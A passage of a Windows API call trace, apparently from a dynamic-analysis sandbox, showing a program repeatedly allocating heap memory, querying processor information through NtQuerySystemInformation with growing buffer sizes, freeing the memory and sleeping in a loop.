Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.913] Sleep (dwMilliseconds=0x110) [0196.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.924] Sleep (dwMilliseconds=0x110) [0196.934] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.935] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.938] Sleep (dwMilliseconds=0x110) [0196.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.955] Sleep (dwMilliseconds=0x110) [0196.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.971] Sleep (dwMilliseconds=0x110) [0196.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.989] Sleep (dwMilliseconds=0x110) [0197.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.007] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.008] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.008] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.014] Sleep (dwMilliseconds=0x110) [0197.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.036] Sleep (dwMilliseconds=0x110) [0197.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.048] Sleep (dwMilliseconds=0x110) [0197.059] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.059] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.066] Sleep (dwMilliseconds=0x110) [0197.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.081] Sleep (dwMilliseconds=0x110) [0197.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.099] Sleep (dwMilliseconds=0x110) [0197.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.110] Sleep (dwMilliseconds=0x110) [0197.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.130] Sleep (dwMilliseconds=0x110) [0197.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.144] HeapFree (in: hHeap=0x2560000, 